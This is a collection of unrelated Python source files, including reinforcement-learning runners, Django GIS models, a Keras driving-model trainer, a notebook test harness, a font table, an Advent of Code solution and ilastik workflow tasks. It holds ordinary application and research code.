# q_vals = self.controller.policy_net(batch)
q_vals = self.controller.policy_net(current_state.to(self.training_config.device))
# Select and perform an action
av_actions = self.env.get_avail_actions()
actions = (self.controller.act(q_vals[0], av_actions, self.step_num).detach().cpu())
# if isinstance(self.controller, MultiAgentActorCritic):
# actions = actions[0]
reward, done, info = self.env.step(actions)
if self.training_config.render_eval:
self.env.render()
self.pbar.update()
# observe new state
next_state = (None if done else self.env.get_graph_state(
self.node_types,
self.controller.agent_types if self.controller.full_agent_communication else None,
v2=self.training_config.v2_state,
))
for key, item in current_state:
item = item.detach()
# pass everything to CPU for storage
# NOTE I don't know if this actually saves GPU memory
for i, _ in enumerate(av_actions):
av_actions[i] = av_actions[i].cpu()
episode.append(Transition(current_state.cpu(), actions, reward, float(done),
av_actions))
# Move to the next state
current_state = next_state
episode_reward += reward
return episode, episode_reward, info
def evaluate(self, n_episodes=32, close_env=False):
time_start = datetime.now()
battles_won = dead_allies = dead_enemies = eval_reward = 0
for _ in tqdm(range(n_episodes), desc="Ep."):
episode, episode_reward, info = self.play_episode()
eval_reward += episode_reward
if "dead_allies" in info:
dead_allies += info["dead_allies"]
dead_enemies += info["dead_enemies"]
if "battle_won" in info:
battles_won += info["battle_won"]
if self.training_config.save_replays:
self.env.save_replay()
things_to_log = {
"episode_reward": (eval_reward / n_episodes),
"battles_won": battles_won / n_episodes,
"time_secs": (datetime.now() - time_start).total_seconds() / n_episodes, }
if "dead_allies" in info:
things_to_log["dead_allies"] = dead_allies / n_episodes
things_to_log["dead_enemies"] = dead_enemies / n_episodes
self.log_episode(things_to_log, prefix="eval")
if close_env:
self.env.close()
class RandomSMACRunner(SMACRunner):
def make_agent(
self,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
encoding_hidden_sizes=None,
encoding_output_size=None,
graph_hidden_sizes=None,
graph_output_size=None,
action_hidden_size=None,
):
return RandomController(
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
self.training_config.device,
)
def run(self):
self.controller.initialize()
while self.step_num < self.training_config.max_num_steps:
step_start = self.step_num
time_start = datetime.now()
self.episode_num += 1
episode_reward = th.zeros(self.controller.n_agents, requires_grad=False)
episode_steps = 0
done = False
while not done:
if (self.training_config.max_steps_episode is not None and
episode_steps >= self.training_config.max_steps_episode):
break
episode_steps += 1
self.step_num += 1
# Select and perform an action
actions = self.controller.act(self.env.get_avail_actions())
reward, done, info = self.env.step(actions)
reward = th.tensor([reward] * self.controller.n_agents, dtype=th.float)
if self.training_config.render_train:
self.env.render()
self.pbar.update()
episode_reward += reward
self.log_episode(step_start, time_start, episode_reward.mean(), info)
if self.step_num < self.training_config.max_num_steps:
self.env.reset()
self.env.close()
if __name__ == "__main__":
trainer = TrainingConfig()
trainer.initialize()
runner: Runner
if trainer.game == TrainingConfig.GameType.SMAC:
# if trainer.action_module in TrainingConfig.OFF_POLICY_METHODS:
runner = OffPolicySMACRunner(trainer)
# elif trainer.action_module == TrainingConfig.ActionModuleType.RANDOM:
# runner = RandomSMACRunner(trainer)
else:
raise ValueError("Game or action module type does not exist")
try:
runner.run()
except (Exception, KeyboardInterrupt) as e:
if isinstance(runner.controller, DRLController):
print("Something happened, saving checkpoint...")
runner.controller.save_checkpoint(runner.training_config.step_num)
if not isinstance(e, KeyboardInterrupt):
with open(path.join(trainer.log_dir, "log.txt"), "a") as f:
import traceback
f.write(str(e))
f.write(traceback.format_exc())
raise e
|
py
|
1a5ef2cf9043d961485d9e41f8d7960f4c978496
|
from django.contrib.gis.db import models
from ..utils import gisfield_may_be_null
class NamedModel(models.Model):
name = models.CharField(max_length=30)
class Meta:
abstract = True
required_db_features = ['gis_enabled']
def __str__(self):
return self.name
class SouthTexasCity(NamedModel):
"City model on projected coordinate system for South Texas."
point = models.PointField(srid=32140)
radius = models.IntegerField(default=10000)
class SouthTexasCityFt(NamedModel):
"Same City model as above, but U.S. survey feet are the units."
point = models.PointField(srid=2278)
class AustraliaCity(NamedModel):
"City model for Australia, using WGS84."
point = models.PointField()
radius = models.IntegerField(default=10000)
class CensusZipcode(NamedModel):
"Model for a few South Texas ZIP codes (in original Census NAD83)."
poly = models.PolygonField(srid=4269)
class SouthTexasZipcode(NamedModel):
"Model for a few South Texas ZIP codes."
poly = models.PolygonField(srid=32140, null=gisfield_may_be_null)
class Interstate(NamedModel):
"Geodetic model for U.S. Interstates."
path = models.LineStringField()
class SouthTexasInterstate(NamedModel):
"Projected model for South Texas Interstates."
path = models.LineStringField(srid=32140)
|
py
|
1a5ef6ee5992827a4a5db875568c700470137a7a
|
import csv
import cv2
import numpy as np
path1='/home/workspace/CarND-Behavioral-Cloning-P3/data/'
path2='/opt/training/'
images = []
measurements = []
def flip(image,measurment):
image_flipped = np.fliplr(image)
measurement_flipped = -measurment
images.append(image_flipped)
measurements.append(measurement_flipped)
def load(path):
lines=[]
with open(path+'driving_log.csv') as csvfile:
reader=csv.reader(csvfile)
for line in reader:
lines.append(line)
i=0
for line in lines:
if i==0:
i+=1
continue
center_path = line[0]
left_path = line[1]
right_path = line[2]
filename_center=center_path.split('/')[-1]
filename_left=left_path.split('/')[-1]
filename_right=right_path.split('/')[-1]
path_center = path + 'IMG/' + filename_center
path_left = path + 'IMG/' + filename_left
path_right = path + 'IMG/' + filename_right
image_center = cv2.imread(path_center)
image_left = cv2.imread(path_left)
image_right = cv2.imread(path_right)
measurment_center = float(line[3])
measurment_left = float(line[3]) + 0.25
measurment_right = float(line[3]) - 0.25
images.append(image_center)
images.append(image_left)
images.append(image_right)
measurements.append(measurment_center)
measurements.append(measurment_left)
measurements.append(measurment_right)
# Flip the image to gain more training data
flip(image_center,measurment_center)
flip(image_left,measurment_left)
flip(image_right,measurment_right)
load(path1)
load(path2)
X_train = np.array(images)
y_train = np.array(measurements)
from keras.models import Sequential
from keras.layers import Lambda, Cropping2D, ELU
from keras.layers.core import Dense, Activation, Flatten, Dropout
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
model = Sequential()
model.add(Lambda(lambda x: x / 255.0 - 0.5,input_shape=(160,320,3)))
model.add(Cropping2D(cropping=((70,25),(0,0))))
model.add(Conv2D(filters=24, kernel_size=(5, 5), activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(filters=36, kernel_size=(5, 5), activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(units=120, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(units=84, activation='relu'))
model.add(Dense(units=10, activation='relu'))
model.add(Dense(units=1))
model.compile(loss='mse', optimizer='adam')
model.fit(X_train, y_train, validation_split=0.2, shuffle=True, nb_epoch=3)
model.save('model.h5')
|
py
|
1a5ef6f93f1c8476939aaadd24da2ab4eed2da8e
|
import os
import re
import sys
from py._io.terminalwriter import get_terminal_width
from . import __version__ as testmynb__version__
from ._ansi import green, red, orange, strip_ansi
class TestHandler:
def __init__(self, *notebooks):
self.notebooks = notebooks
@property
def _summary(self):
notebook_count = len(self.notebooks)
test_count = sum([len(nb.extract_codes()) for nb in self.notebooks])
py_ver = re.sub(r"\s.*", "", sys.version)
header = self._h1_message("Test My Notebook ({})".format(testmynb__version__))
return "{}".format(header) + "\n".join(
[
"Platform {}".format(sys.platform),
"Python {}".format(py_ver),
"Working Directory: {}".format(os.getcwd()),
"",
"{0} test cells across {1} notebook(s) detected.".format(
test_count, notebook_count
),
"",
]
)
@staticmethod
def _h1_message(message):
col = get_terminal_width()
no_formats = strip_ansi(message)
# Remove the ANSI escape codes to check the message length
num_equals = (col - len(no_formats) - 3) // 2
equals_sign = num_equals * "="
return "{1} {0} {1}\n".format(message, equals_sign)
@property
def _notebook_summary_section(self):
section = ["Notebooks:\n"]
for nb in self.notebooks:
trust = green("Trusted") if nb.trusted else red("Untrusted")
string = "{} {}: {}\n".format(trust, nb.name, nb.result)
section.append(string)
section.append("\n")
return "".join(section)
def __call__(self):
failed_or_error = False
output_message = list()
for nb in self.notebooks:
nb()
output_message.append(self._summary)
output_message.append(self._notebook_summary_section)
errors = self.collect_errors()
fails = self.collect_fails()
if fails:
failed_or_error = True
head_message = red(self._h1_message("Failed Test(s)"))
output_message.append(head_message)
for cell, err in fails.items():
string = "---- {}: {} ----\n".format(cell.notebook, cell.name)
output_message.append(string)
output_message.append(str(cell))
output_message.append(
red("\n-----------------------------------------\n")
)
output_message.append(err)
output_message.append("\n\n")
if errors:
failed_or_error = True
head_message = orange(self._h1_message("Errored Test(s)"))
output_message.append(head_message)
for cell, err in errors.items():
string = "---- {}: {} ----\n".format(cell.notebook, cell.name)
output_message.append(string)
output_message.append(str(cell))
output_message.append(
red("\n-----------------------------------------\n")
)
output_message.append(err)
output_message.append("\n\n")
output_message.append(self._final_remarks)
output_message = "".join(output_message)
print(output_message)
if failed_or_error:
sys.exit(1)
@property
def _final_remarks(self):
all_tests = "".join([nb.result for nb in self.notebooks])
passed_test_count = all_tests.count(".")
failed_test_count = all_tests.count("F")
errored_test_count = all_tests.count("E")
passed_text = green("{} test(s) passed".format(passed_test_count))
failed_text = red("{} failed".format(failed_test_count))
error_text = orange(" and {} raised an error".format(errored_test_count))
return self._h1_message(
"{}, {},{}".format(passed_text, failed_text, error_text)
)
def collect_errors(self):
errors = dict()
for nb in self.notebooks:
errors.update(nb.get_error_stack())
return errors
def collect_fails(self):
fails = dict()
for nb in self.notebooks:
fails.update(nb.get_fail_stack())
return fails
def find_notebooks(*args):
notebooks = list()
if len(args):
for path in args:
if os.path.isfile(path):
notebooks.append(path)
elif os.path.isdir(path):
notebooks.extend(_recursive_find_notebooks(path))
else:
notebooks = _recursive_find_notebooks(os.getcwd())
return notebooks
def _recursive_find_notebooks(path):
notebooks = list()
for root, dirs, files in os.walk(path):
for file in files:
if ".ipynb_checkpoints" in root:
continue
if re.match(r"^test_.+\.ipynb", file):
notebooks.append(os.path.join(root, file))
return notebooks
|
py
|
1a5ef74fe95e0a7e1934539ea46803001ebe441c
|
n = int(input())
i = n // 5
while i >= 0:
q, r = divmod(n - 5 * i, 3)
if r == 0:
print(i + q)
break
i -= 1
if i < 0:
print(-1)
|
py
|
1a5ef7f6617a47e4f075b37c588af796c37f2adf
|
import numpy as np
import os.path as osp
from rllab import spaces
from rllab.envs.base import Env
from rllab.misc.overrides import overrides
from rllab.mujoco_py import MjModel, MjViewer
from rllab.misc import autoargs
from rllab.misc import logger
import theano
import tempfile
import os
import mako.template
import mako.lookup
MODEL_DIR = osp.abspath(
osp.join(
osp.dirname(__file__),
'../../../vendor/mujoco_models'
)
)
BIG = 1e6
class MujocoEnv(Env):
FILE = None
@autoargs.arg('action_noise', type=float,
help='Noise added to the controls, which will be '
'proportional to the action bounds')
def __init__(self, action_noise=0.0, file_path=None, template_args=None):
# compile template
if file_path is None:
if self.__class__.FILE is None:
raise "Mujoco file not specified"
file_path = osp.join(MODEL_DIR, self.__class__.FILE)
if file_path.endswith(".mako"):
lookup = mako.lookup.TemplateLookup(directories=[MODEL_DIR])
with open(file_path) as template_file:
template = mako.template.Template(
template_file.read(), lookup=lookup)
content = template.render(
opts=template_args if template_args is not None else {},
)
tmp_f, file_path = tempfile.mkstemp(text=True)
with open(file_path, 'w') as f:
f.write(content)
self.model = MjModel(file_path)
os.close(tmp_f)
else:
self.model = MjModel(file_path)
self.data = self.model.data
self.viewer = None
self.init_qpos = self.model.data.qpos
self.init_qvel = self.model.data.qvel
self.init_qacc = self.model.data.qacc
self.init_ctrl = self.model.data.ctrl
self.qpos_dim = self.init_qpos.size
self.qvel_dim = self.init_qvel.size
self.ctrl_dim = self.init_ctrl.size
self.action_noise = action_noise
if "frame_skip" in self.model.numeric_names:
frame_skip_id = self.model.numeric_names.index("frame_skip")
addr = self.model.numeric_adr.flat[frame_skip_id]
self.frame_skip = int(self.model.numeric_data.flat[addr])
else:
self.frame_skip = 1
if "init_qpos" in self.model.numeric_names:
init_qpos_id = self.model.numeric_names.index("init_qpos")
addr = self.model.numeric_adr.flat[init_qpos_id]
size = self.model.numeric_size.flat[init_qpos_id]
init_qpos = self.model.numeric_data.flat[addr:addr + size]
self.init_qpos = init_qpos
self.dcom = None
self.current_com = None
self.reset()
super(MujocoEnv, self).__init__()
@property
@overrides
def action_space(self):
bounds = self.model.actuator_ctrlrange
lb = bounds[:, 0]
ub = bounds[:, 1]
return spaces.Box(lb, ub)
@property
@overrides
def observation_space(self):
shp = self.get_current_obs().shape
ub = BIG * np.ones(shp)
return spaces.Box(ub * -1, ub)
@property
def action_bounds(self):
return self.action_space.bounds
def reset_mujoco(self, init_state=None):
if init_state is None:
self.model.data.qpos = self.init_qpos + \
np.random.normal(size=self.init_qpos.shape) * 0.01
self.model.data.qvel = self.init_qvel + \
np.random.normal(size=self.init_qvel.shape) * 0.1
self.model.data.qacc = self.init_qacc
self.model.data.ctrl = self.init_ctrl
else:
start = 0
for datum_name in ["qpos", "qvel", "qacc", "ctrl"]:
datum = getattr(self.model.data, datum_name)
datum_dim = datum.shape[0]
datum = init_state[start: start + datum_dim]
setattr(self.model.data, datum_name, datum)
start += datum_dim
@overrides
def reset(self, init_state=None):
self.reset_mujoco(init_state)
self.model.forward()
self.current_com = self.model.data.com_subtree[0]
self.dcom = np.zeros_like(self.current_com)
return self.get_current_obs()
def get_current_obs(self):
return self._get_full_obs()
def _get_full_obs(self):
data = self.model.data
cdists = np.copy(self.model.geom_margin).flat
for c in self.model.data.contact:
cdists[c.geom2] = min(cdists[c.geom2], c.dist)
obs = np.concatenate([
data.qpos.flat,
data.qvel.flat,
# data.cdof.flat,
data.cinert.flat,
data.cvel.flat,
# data.cacc.flat,
data.qfrc_actuator.flat,
data.cfrc_ext.flat,
data.qfrc_constraint.flat,
cdists,
# data.qfrc_bias.flat,
# data.qfrc_passive.flat,
self.dcom.flat,
])
return obs
@property
def _state(self):
return np.concatenate([
self.model.data.qpos.flat,
self.model.data.qvel.flat
])
@property
def _full_state(self):
return np.concatenate([
self.model.data.qpos,
self.model.data.qvel,
self.model.data.qacc,
self.model.data.ctrl,
]).ravel()
def inject_action_noise(self, action):
# generate action noise
noise = self.action_noise * \
np.random.normal(size=action.shape)
# rescale the noise to make it proportional to the action bounds
lb, ub = self.action_bounds
noise = 0.5 * (ub - lb) * noise
return action + noise
def forward_dynamics(self, action):
self.model.data.ctrl = self.inject_action_noise(action)
for _ in range(self.frame_skip):
self.model.step()
self.model.forward()
new_com = self.model.data.com_subtree[0]
self.dcom = new_com - self.current_com
self.current_com = new_com
def get_viewer(self):
if self.viewer is None:
self.viewer = MjViewer()
self.viewer.start()
self.viewer.set_model(self.model)
return self.viewer
def render(self, close=False):
if close:
self.stop_viewer()
else:
#self.get_viewer().render()
self.get_viewer().loop_once()
data, width, height = self.get_viewer().get_image()
return np.fromstring(data, dtype='uint8').reshape(height, width, 3)[::-1, :, :]
return None
def start_viewer(self):
viewer = self.get_viewer()
if not viewer.running:
viewer.start()
def stop_viewer(self):
if self.viewer:
self.viewer.finish()
self.viewer = None
def release(self):
# temporarily alleviate the issue (but still some leak)
from rllab.mujoco_py.mjlib import mjlib
mjlib.mj_deleteModel(self.model._wrapped)
mjlib.mj_deleteData(self.data._wrapped)
def get_body_xmat(self, body_name):
idx = self.model.body_names.index(body_name)
return self.model.data.xmat[idx].reshape((3, 3))
def get_body_com(self, body_name):
idx = self.model.body_names.index(body_name)
return self.model.data.com_subtree[idx]
def get_body_comvel(self, body_name):
idx = self.model.body_names.index(body_name)
return self.model.body_comvels[idx]
def print_stats(self):
super(MujocoEnv, self).print_stats()
print("qpos dim:\t%d" % len(self.model.data.qpos))
def action_from_key(self, key):
raise NotImplementedError
|
py
|
1a5ef949b8ae69a219ea60fda0c9cd33c8814d80
|
"""converted from ..\fonts\vga_8x8.bin """
WIDTH = 8
HEIGHT = 8
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x18\x3c\x3c\x18\x18\x00\x18\x00'\
b'\x66\x66\x24\x00\x00\x00\x00\x00'\
b'\x6c\x6c\xfe\x6c\xfe\x6c\x6c\x00'\
b'\x18\x3e\x60\x3c\x06\x7c\x18\x00'\
b'\x00\xc6\xcc\x18\x30\x66\xc6\x00'\
b'\x38\x6c\x38\x76\xdc\xcc\x76\x00'\
b'\x18\x18\x30\x00\x00\x00\x00\x00'\
b'\x0c\x18\x30\x30\x30\x18\x0c\x00'\
b'\x30\x18\x0c\x0c\x0c\x18\x30\x00'\
b'\x00\x66\x3c\xff\x3c\x66\x00\x00'\
b'\x00\x18\x18\x7e\x18\x18\x00\x00'\
b'\x00\x00\x00\x00\x00\x18\x18\x30'\
b'\x00\x00\x00\x7e\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x18\x18\x00'\
b'\x06\x0c\x18\x30\x60\xc0\x80\x00'\
b'\x38\x6c\xc6\xd6\xc6\x6c\x38\x00'\
b'\x18\x38\x18\x18\x18\x18\x7e\x00'\
b'\x7c\xc6\x06\x1c\x30\x66\xfe\x00'\
b'\x7c\xc6\x06\x3c\x06\xc6\x7c\x00'\
b'\x1c\x3c\x6c\xcc\xfe\x0c\x1e\x00'\
b'\xfe\xc0\xc0\xfc\x06\xc6\x7c\x00'\
b'\x38\x60\xc0\xfc\xc6\xc6\x7c\x00'\
b'\xfe\xc6\x0c\x18\x30\x30\x30\x00'\
b'\x7c\xc6\xc6\x7c\xc6\xc6\x7c\x00'\
b'\x7c\xc6\xc6\x7e\x06\x0c\x78\x00'\
b'\x00\x18\x18\x00\x00\x18\x18\x00'\
b'\x00\x18\x18\x00\x00\x18\x18\x30'\
b'\x06\x0c\x18\x30\x18\x0c\x06\x00'\
b'\x00\x00\x7e\x00\x00\x7e\x00\x00'\
b'\x60\x30\x18\x0c\x18\x30\x60\x00'\
b'\x7c\xc6\x0c\x18\x18\x00\x18\x00'\
b'\x7c\xc6\xde\xde\xde\xc0\x78\x00'\
b'\x38\x6c\xc6\xfe\xc6\xc6\xc6\x00'\
b'\xfc\x66\x66\x7c\x66\x66\xfc\x00'\
b'\x3c\x66\xc0\xc0\xc0\x66\x3c\x00'\
b'\xf8\x6c\x66\x66\x66\x6c\xf8\x00'\
b'\xfe\x62\x68\x78\x68\x62\xfe\x00'\
b'\xfe\x62\x68\x78\x68\x60\xf0\x00'\
b'\x3c\x66\xc0\xc0\xce\x66\x3a\x00'\
b'\xc6\xc6\xc6\xfe\xc6\xc6\xc6\x00'\
b'\x3c\x18\x18\x18\x18\x18\x3c\x00'\
b'\x1e\x0c\x0c\x0c\xcc\xcc\x78\x00'\
b'\xe6\x66\x6c\x78\x6c\x66\xe6\x00'\
b'\xf0\x60\x60\x60\x62\x66\xfe\x00'\
b'\xc6\xee\xfe\xfe\xd6\xc6\xc6\x00'\
b'\xc6\xe6\xf6\xde\xce\xc6\xc6\x00'\
b'\x7c\xc6\xc6\xc6\xc6\xc6\x7c\x00'\
b'\xfc\x66\x66\x7c\x60\x60\xf0\x00'\
b'\x7c\xc6\xc6\xc6\xc6\xce\x7c\x0e'\
b'\xfc\x66\x66\x7c\x6c\x66\xe6\x00'\
b'\x3c\x66\x30\x18\x0c\x66\x3c\x00'\
b'\x7e\x7e\x5a\x18\x18\x18\x3c\x00'\
b'\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00'\
b'\xc6\xc6\xc6\xc6\xc6\x6c\x38\x00'\
b'\xc6\xc6\xc6\xd6\xd6\xfe\x6c\x00'\
b'\xc6\xc6\x6c\x38\x6c\xc6\xc6\x00'\
b'\x66\x66\x66\x3c\x18\x18\x3c\x00'\
b'\xfe\xc6\x8c\x18\x32\x66\xfe\x00'\
b'\x3c\x30\x30\x30\x30\x30\x3c\x00'\
b'\xc0\x60\x30\x18\x0c\x06\x02\x00'\
b'\x3c\x0c\x0c\x0c\x0c\x0c\x3c\x00'\
b'\x10\x38\x6c\xc6\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xff'\
b'\x30\x18\x0c\x00\x00\x00\x00\x00'\
b'\x00\x00\x78\x0c\x7c\xcc\x76\x00'\
b'\xe0\x60\x7c\x66\x66\x66\xdc\x00'\
b'\x00\x00\x7c\xc6\xc0\xc6\x7c\x00'\
b'\x1c\x0c\x7c\xcc\xcc\xcc\x76\x00'\
b'\x00\x00\x7c\xc6\xfe\xc0\x7c\x00'\
b'\x3c\x66\x60\xf8\x60\x60\xf0\x00'\
b'\x00\x00\x76\xcc\xcc\x7c\x0c\xf8'\
b'\xe0\x60\x6c\x76\x66\x66\xe6\x00'\
b'\x18\x00\x38\x18\x18\x18\x3c\x00'\
b'\x06\x00\x06\x06\x06\x66\x66\x3c'\
b'\xe0\x60\x66\x6c\x78\x6c\xe6\x00'\
b'\x38\x18\x18\x18\x18\x18\x3c\x00'\
b'\x00\x00\xec\xfe\xd6\xd6\xd6\x00'\
b'\x00\x00\xdc\x66\x66\x66\x66\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\x00'\
b'\x00\x00\xdc\x66\x66\x7c\x60\xf0'\
b'\x00\x00\x76\xcc\xcc\x7c\x0c\x1e'\
b'\x00\x00\xdc\x76\x60\x60\xf0\x00'\
b'\x00\x00\x7e\xc0\x7c\x06\xfc\x00'\
b'\x30\x30\xfc\x30\x30\x36\x1c\x00'\
b'\x00\x00\xcc\xcc\xcc\xcc\x76\x00'\
b'\x00\x00\xc6\xc6\xc6\x6c\x38\x00'\
b'\x00\x00\xc6\xd6\xd6\xfe\x6c\x00'\
b'\x00\x00\xc6\x6c\x38\x6c\xc6\x00'\
b'\x00\x00\xc6\xc6\xc6\x7e\x06\xfc'\
b'\x00\x00\x7e\x4c\x18\x32\x7e\x00'\
b'\x0e\x18\x18\x70\x18\x18\x0e\x00'\
b'\x18\x18\x18\x18\x18\x18\x18\x00'\
b'\x70\x18\x18\x0e\x18\x18\x70\x00'\
b'\x76\xdc\x00\x00\x00\x00\x00\x00'\
b'\x00\x10\x38\x6c\xc6\xc6\xfe\x00'\
FONT = memoryview(_FONT)
|
py
|
1a5ef96586a5688fbef953f40b993b74da3b0156
|
import webapp2
import json
from google.appengine.api import users
from google.appengine.ext import ndb
from serializers import default_json_serializer
from models import GoogleAuth
class GoogleAuthApi(webapp2.RequestHandler):
def get(self):
google_auths = GoogleAuth.query_by_user_id(users.get_current_user().user_id()).fetch()
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps([dict(g.to_dict(), **dict(id=g.key.id())) for g in google_auths], default=default_json_serializer))
|
py
|
1a5efa4bf7855a2413523888b5e6fe64a6342c3a
|
from collections import defaultdict, deque
import re
CHALLENGE_DAY = "22"
REAL = open(CHALLENGE_DAY + ".txt").read()
SAMPLE = open(CHALLENGE_DAY + ".sample.txt").read()
SAMPLE_EXPECTED = 306
# SAMPLE_EXPECTED =
def parse_lines(raw):
# Groups.
groups = raw.split("\n\n")
g1 = map(int, groups[0].split("\n")[1:])
q1 = deque(g1)
g2 = map(int, groups[1].split("\n")[1:])
q2 = deque(g2)
return q1, q2
# return list(map(lambda group: group.split("\n"), groups))
# lines = raw.split("\n")
# return lines # raw
# return list(map(lambda l: l.split(" "), lines)) # words.
# return list(map(int, lines))
# return list(map(lambda l: l.strip(), lines)) # beware leading / trailing WS
def solve(raw):
p1, p2 = parse_lines(raw)
# Debug here to make sure parsing is good.
while p1 and p2:
c1 = int(p1.popleft())
c2 = int(p2.popleft())
if c1 > c2:
p1.append(c1)
p1.append(c2)
else:
p2.append(c2)
p2.append(c1)
if p1:
winner = p1
else:
winner = p2
ret = 0
val = 1
while winner:
ret += val * winner.pop()
val += 1
return ret
sample = solve(SAMPLE)
if sample != SAMPLE_EXPECTED:
print("SAMPLE FAILED: ", sample, " != ", SAMPLE_EXPECTED)
assert sample == SAMPLE_EXPECTED
print("\n*** SAMPLE PASSED ***\n")
solved = solve(REAL)
print("SOLUTION: ", solved)
import pandas as pd
df=pd.DataFrame([str(solved)])
df.to_clipboard(index=False,header=False)
print("COPIED TO CLIPBOARD")
|
py
|
1a5efacd3447081a53223623aca9dab92327bdb3
|
import os
import luigi
import uuid
import cluster_tools.utils.volume_utils as vu
from ..graph import GraphWorkflow
from ..cluster_tasks import WorkflowBase
from ..features import EdgeFeaturesWorkflow
from .. import copy_volume as copy_tasks
from . import prediction as predict_tasks
from . import merge_predictions as merge_tasks
from .carving import WriteCarving
class IlastikPredictionWorkflow(WorkflowBase):
input_path = luigi.Parameter()
input_key = luigi.Parameter()
output_path = luigi.Parameter()
output_key = luigi.Parameter()
ilastik_folder = luigi.Parameter()
ilastik_project = luigi.Parameter()
halo = luigi.ListParameter()
n_channels = luigi.IntParameter()
def requires(self):
is_h5 = vu.is_h5(self.output_path)
out_key = None if is_h5 else self.output_key
predict_task = getattr(predict_tasks,
self._get_task_name('Prediction'))
dep = predict_task(tmp_folder=self.tmp_folder,
max_jobs=self.max_jobs,
config_dir=self.config_dir,
input_path=self.input_path,
input_key=self.input_key,
output_path=self.output_path,
output_key=out_key,
ilastik_folder=self.ilastik_folder,
ilastik_project=self.ilastik_project,
halo=self.halo, n_channels=self.n_channels)
# we only need to merge the predictions seperately if the
# output file is hdf5
if is_h5:
output_prefix = os.path.splitext(self.output_path)[0]
merge_task = getattr(merge_tasks,
self._get_task_name('MergePredictions'))
dep = merge_task(tmp_folder=self.tmp_folder,
max_jobs=self.max_jobs,
config_dir=self.config_dir,
dependency=dep,
input_path=self.input_path,
input_key=self.input_key,
tmp_prefix=output_prefix,
output_path=self.output_path,
output_key=self.output_key,
halo=self.halo,
n_channels=self.n_channels)
return dep
@staticmethod
def get_config():
configs = super(IlastikPredictionWorkflow, IlastikPredictionWorkflow).get_config()
configs.update({'prediction':
predict_tasks.PredictionLocal.default_task_config(),
'merge_predictions':
merge_tasks.MergePredictionsLocal.default_task_config()})
return configs
class IlastikCarvingWorkflow(WorkflowBase):
""" Make carving project with watershed and graph
"""
input_path = luigi.Parameter()
input_key = luigi.Parameter()
watershed_path = luigi.Parameter()
watershed_key = luigi.Parameter()
output_path = luigi.Parameter()
copy_inputs = luigi.BoolParameter(default=False)
def requires(self):
tmp_path = os.path.join(self.tmp_folder, 'exp_data.n5')
graph_key = 'graph'
feat_key = 'feats'
# TODO make param ?
max_jobs_merge = 1
dep = GraphWorkflow(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=self.max_jobs, target=self.target,
dependency=self.dependency,
input_path=self.watershed_path, input_key=self.watershed_key,
graph_path=tmp_path, output_key=graph_key)
dep = EdgeFeaturesWorkflow(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=self.max_jobs, target=self.target, dependency=dep,
input_path=self.input_path, input_key=self.input_key,
labels_path=self.watershed_path,
labels_key=self.watershed_key,
graph_path=tmp_path, graph_key=graph_key,
output_path=tmp_path, output_key=feat_key,
max_jobs_merge=max_jobs_merge)
# write the carving graph data and metadata
uid = str(uuid.uuid1())
dep = WriteCarving(input_path=tmp_path, graph_key=graph_key, features_key=feat_key,
raw_path=self.input_path, raw_key=self.input_key, uid=uid,
output_path=self.output_path, copy_inputs=self.copy_inputs,
dependency=dep)
# TODO
# we need to transpose the data before copying
# that's why return here for now, to do the transposing outside of
# cluster_tools, but should implement it here as well
return dep
copy_task = getattr(copy_tasks, self._get_task_name('CopyVolume'))
# copy the watershed segmentation to ilastik file
ilastik_seg_key = 'preprocessing/graph/labels'
ilastik_seg_dtype = 'uint32' # TODO is uint32 correct ?
dep = copy_task(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=1, dependency=dep,
input_path=self.watershed_path, input_key=self.watershed_key,
output_path=self.output_path, output_key=ilastik_seg_key,
dtype=ilastik_seg_dtype, prefix='watershed')
# copy the input map to ilastik file
if self.copy_inputs:
ilastik_inp_key = 'Input Data/local_data/%s' % uid
ilastik_inp_dtype = 'float32' # is float32 correct ?
dep = copy_task(tmp_folder=self.tmp_folder, config_dir=self.config_dir,
max_jobs=1, dependency=dep,
input_path=self.input_path, input_key=self.input_key,
output_path=self.output_path, output_key=ilastik_inp_key,
dtype=ilastik_inp_dtype, prefix='inputs')
return dep
@staticmethod
def get_config():
configs = super(IlastikCarvingWorkflow, IlastikCarvingWorkflow).get_config()
configs.update({"copy_volume": copy_tasks.CopyVolumeLocal.default_task_config(),
**EdgeFeaturesWorkflow.get_config(),
**GraphWorkflow.get_config()})
return configs
|
py
|
1a5efae712176fb5ae77b2d576eb5217b4452583
|
import predict
train_data_path, predict_data_path, predict_output_path = predict.download_data()
for model_id, model_type in predict.MODEL_CONFIGS:
predict.train(train_data_path, model_id, model_type, force_training=True)
|
py
|
1a5efb5dc8368ea3a6ddbfdd4fef9a851d679c42
|
import streamlit as st
import pandas as pd
import pickle
import _pickle as cPickle
file0 = open("setdf.pkl","rb")
setdf = pickle.load(file0)
file0.close()
num_columns = setdf.shape[1]
st.dataframe(setdf)
# checkboxdict = dict()
# for i,row in setdf.iterrows():
# coltuples = st.columns(num_columns+1)
# with coltuples[0]:
# checkboxdict[i]= st.checkbox("",key=i)
# for col in range(num_columns):
# with coltuples[col]:
# st.write(setdf.iloc[i,col])
#for i,row in phendf.iterrows():
|
py
|
1a5efc0e8c937716bc0b8615adc05e7dd70286bb
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
